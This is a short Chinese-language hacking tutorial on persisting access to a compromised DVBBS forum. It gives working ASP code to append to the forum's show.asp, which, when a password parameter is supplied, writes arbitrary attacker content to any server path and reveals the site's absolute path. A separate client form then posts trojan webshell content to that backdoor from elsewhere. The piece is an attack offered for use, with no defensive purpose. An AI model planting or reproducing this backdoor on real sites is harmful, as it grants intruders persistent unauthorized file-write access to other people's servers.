后门新思路

今天给大家说一下 在动网BBS下一个做后门的新思路
 大家入侵完一个动网BBS后，怎么做一个后门，这个是我攻击一个黄色网站时候想到的，但不知道是不是有人已经比我先想到，我就在这里说了！
好了，开始吧，我们在他论坛下找到show.asp，然后编辑！
在最下面插入
<%dim noon%>
<%noon=request("noon")%>
<%if noon="xxql.com" then%>
<%dim objFSO%>
<%dim fdata%>
<%dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%if err =0 then%>
<%response.write "<font color=red>save Success!</font>"%>
<%else%>
<%response.write "<font color=red>Save UnSuccess!</font>"%>
<%end if%>
<%err.clear%>
<%end if%>
<%objCountFile.Close%>
<%Set objCountFile=Nothing%>
<%Set objFSO = Nothing%>
<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
<%end if%>
我只是把人家的代码拆分了一下用用，嘿嘿，别建议哈
然后大家看一下：http://www.XXX.com/bbs/show.asp?noon=xxql.com
拉到最下面，看到绝对路径了没有？
在人家论坛的后门已经算做好了，什么意思呢，很简单，这是一个服务端的代码，然后您在其他空间或者本地支持ASP的地方做一个客户端，看代码：
<%Response.write "<form action='http://www.xxx.com/bbs/show.asp' method=post>"%>
<%Response.Write "<input type=text name=syfdpath width=32 size=50 value=E:\www\www.xxx.com\bbs\asp.asp>"%>
<%Response.Write ""%>
<%Response.write ""%>
<%Response.write "输入马的内容:"%>
<%Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>"%>
<%Response.write "<input type=submit value=保存>"%>
<%Response.write "</form>"%>
这里我说明一下，在服务端的最后一段代码是显示绝对路径的
然后在客户端的 action="" 里就填上你服务端所在的文件路径
下面一个value="" 改成你存放在马所在服务器上的绝对路径
这样你随便把客户端放在哪里都可以对服务端上传其他的木马
就这样，很简单！假如大家觉得麻烦也可以用海洋里自带的后门工具